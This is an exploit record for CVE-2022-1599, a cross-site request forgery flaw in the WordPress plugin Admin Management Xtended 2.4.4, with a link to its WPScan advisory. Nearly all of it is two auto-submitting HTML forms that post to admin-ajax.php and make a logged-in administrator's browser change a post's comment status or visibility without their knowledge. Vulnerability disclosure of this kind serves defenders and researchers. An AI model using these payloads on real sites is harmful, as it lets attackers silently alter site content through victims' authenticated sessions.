CVE: CVE-2022-1599

Name: Admin Management Xtended (admin-management-xtended)

Version: 2.4.4

Date: 2022-04-13 21:34:31

Advisory: https://wpscan.com/vulnerability/4a36e876-7e3b-4a81-9f16-9ff5fbb20dd6

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="ame_ajax_set_commentstatus">
    <input type="text" name="postid" value="1">
    <input type="text" name="comment_status" value="1">
    <input type="text" name="posttype" value="post">
    <input type="text" name="rndval" value="1649885285073">
</form>
<script>
    document.forms[0].submit();
</script>

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="ame_toggle_visibility">
    <input type="text" name="category_id" value="1">
    <input type="text" name="vis_status" value="draft">
    <input type="text" name="posttype" value="post">
    <input type="text" name="rndval" value="1649885285073">
</form>
<script>
    document.forms[0].submit();
</script>